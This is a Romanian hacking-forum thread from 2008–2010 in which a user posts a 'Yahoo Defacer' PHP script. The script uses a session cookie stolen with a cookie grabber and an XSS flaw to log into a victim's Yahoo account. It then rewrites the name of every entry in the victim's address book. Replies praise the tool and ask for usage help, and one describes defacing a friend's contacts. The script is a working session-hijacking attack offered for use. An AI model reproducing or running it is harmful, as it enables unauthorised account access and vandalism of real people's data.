AhEaD Posted October 26, 2008 Report Share Posted October 26, 2008 Scripting si idee: AhEaDCorectarea erorilor de rigoare: Kenpachi ( "special thanks" )Folosire: - Necesita RST Profesional Cookie Grabber.3 fielduri:1.Cookie - Linkul de logare din "RST Professional Cookie Grabber"2. si 3. Numele cu care sa fie modificata lista victimei.POC:<title>Yahoo Defacer - Rstcenter.com [ AhEaD ]</title><style type="text/css"><!--body,td,th { font-family: Arial, Helvetica, sans-serif; font-size: 10px; color: #99FF00;}body { background-color: #000000;}.smecleu2 { font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; background-color: #000000; border: thin inset #99FF00; color: #99FF00;}--></style>Yahoo Defacer - Rstcenter.com [ AhEaD ] <br /><br />Cookie:<input type="text" name="url" class="smecleu2" value="<?php echo $url ?>"><br /><br /> Fname:<input type="text" name="fname" class="smecleu2" value="<?php echo $fname ?>"><br /> Lname:<input type="text" name="lname" class="smecleu2" value="<?php echo $lname ?>"><br /> <input type="hidden" name="action" value="send"> </p></p><p> <input name="submit" type="submit" class="smecleu2" value="Deles"><p><?phpset_time_limit(0);ignore_user_abort(1);ini_set("memory_limit", "64M");$url = $_POST['url'];$fname = urlencode($_POST['fname']);$lname = urlencode($_POST['lname']);$useragent = "YahooSeeker-Testing/v3.9 (compatible; Mozilla 4.0; MSIE 5.5; http://search.yahoo.com/)";if ($action=="send"){$ch = curl_init(); curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_REFERER, "http://mail.yahoo.com"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_ANY);curl_setopt ($ch, CURLOPT_COOKIEJAR, 'cookie.txt');ob_start(); curl_exec ($ch);ob_end_clean(); curl_close ($ch);unset($ch);function curl($url) { $rand = rand(100000,400000); $agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/".$rand." Netscape/7.1 (ax)"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, $agent); curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); $result = curl_exec ($ch); return $result; curl_close ($ch);}function curl2($url2, $post) { $rand = rand(100000,400000); $agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/".$rand." Netscape/7.1 (ax)"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_REFERER, $ref); curl_setopt($ch, CURLOPT_USERAGENT, $agent); curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_POST, 1); $result = curl_exec ($ch); return $result; curl_close ($ch);}function parsepage($get){ $ext = explode('name="crumb_value" value="', $get); $ext = explode('"/>', $ext[1]); if($ext[0] !== ''){ //echo $ext[0].'<br>'; } flush(); return $ext[0];}function parsepage3($get){ $ext3 = explode("$id".'&', $get); $ext3 = explode('"/>', $ext3[1]); if($ext3[0] !== ''){ } flush(); return $ext3[0];}for($a=1;$a<30;$a++){ $url = 'http://intl.m.yahoo.com/p/addressbook/Listing?page='.$a; $get = curl($url); $yid = explode('/p/addressbook/Details?id=', $get); $nr = count($yid); $nr2 = $nr - 1; for($j=1;$j<$nr;$j++){ $id = explode('&', $yid[$j]); $id = $id[0].''; //echo $id.'<br>'; echo $id; $urlmod = 'http://intl.m.yahoo.com/p/addressbook/EditPropertyForm?property=name&id='; $get = curl($urlmod); $rez = parsepage($get);///crumb $rez = urlencode($rez); $ref = 'http://intl.m.yahoo.com/p/addressbook/EditPropertyForm?property=name&id='.$id;//."&".$pizda; //echo $ref; $url2 = 'http://intl.m.yahoo.com/p/addressbook/EditCompleted'; $post = 'fn='.$fname.'&ln='.$lname.'&nn=&id='.$id.'&function=editing&Save=Save&Cancel=Cancel&sub_function=name&crumb_value='.$rez.'&display_name=AhEaD&name=Save'; //echo "<br>".$post; $daiiiiii = curl2($url2, $post); echo $daiiiiii; //echo " Editing was successful ... continuing <br>"; flush(); }if($nr<2){$a = 100;} }echo "DONE !!!!!!!";}?> 5 Quote Link to comment Share on other sites More sharing options...
paxnWo Posted October 26, 2008 Report Share Posted October 26, 2008 zomg congratz !!! nu sunteti intregi Quote Link to comment Share on other sites More sharing options...
dblackshell Posted October 26, 2008 Report Share Posted October 26, 2008 ingenios, niciodata nu m-as fi gandit sa manipulez informatiile din lista de contact... gandire OOTB (out of the box)... +1 Quote Link to comment Share on other sites More sharing options...
xZu Posted October 27, 2008 Report Share Posted October 27, 2008 Foarte dragut...impresionant, gg (cs-istule) +1 Quote Link to comment Share on other sites More sharing options...
Hellbound Posted October 27, 2008 Report Share Posted October 27, 2008 Disper vad atate-a tutoriale ff faine ... dar nu ineleg cum se face sa mearga . Quote Link to comment Share on other sites More sharing options...
Raven Posted October 30, 2008 Report Share Posted October 30, 2008 omg super ideea gg Quote Link to comment Share on other sites More sharing options...
MaX19 Posted November 21, 2008 Report Share Posted November 21, 2008 fain imi place mult ms Quote Link to comment Share on other sites More sharing options...
Itzzu Posted November 21, 2008 Report Share Posted November 21, 2008 .. ok .. si un users guide .. poti sa faci si tu .. cepui la coookie si ce pui la Lname si Fname?.. Quote Link to comment Share on other sites More sharing options...
AhEaD Posted November 21, 2008 Author Report Share Posted November 21, 2008 .. ok .. si un users guide .. poti sa faci si tu .. cepui la coookie si ce pui la Lname si Fname?..Simplu, pt. cookie ai nevoie de : http://www.rstcenter.com/forum/showthread.php?t=8934 + un xss in yahoo.Lname si Fname sunt numele cu care vrei sa modifici lista respectivei victimi. 1 Quote Link to comment Share on other sites More sharing options...
HexString Posted November 21, 2008 Report Share Posted November 21, 2008 bravo Ahead. Quote Link to comment Share on other sites More sharing options...
andy95 Posted January 2, 2009 Report Share Posted January 2, 2009 acum recunosc k sunt shi eu... "noob" sau "newbie" se poate posta un video tutorial ? Quote Link to comment Share on other sites More sharing options...
devianc3 Posted January 2, 2009 Report Share Posted January 2, 2009 Poate sa-mi dea cineva un exemplu de cum trebuie sa arate linkul ce trebuie bagat in textbox la script?.. Cel de pe cookie grabber?.. pt ca eu s-ar putea sa am alte metode de racolare a cookie-urilor, ne-folosind xss. Would appreciate it;) Quote Link to comment Share on other sites More sharing options...
black_death_c4t Posted January 2, 2009 Report Share Posted January 2, 2009 really shitty , won't work for me -.- Quote Link to comment Share on other sites More sharing options...
wildchild Posted February 19, 2010 Report Share Posted February 19, 2010 trebuia sa ii vedeti fata unei amice cand si-a vazut ca lista e plina de "recycle bin" in loc de users names.good job anyway Quote Link to comment Share on other sites More sharing options...
BonesTDK Posted November 15, 2010 Report Share Posted November 15, 2010 Interesant felicitari ! Quote Link to comment Share on other sites More sharing options...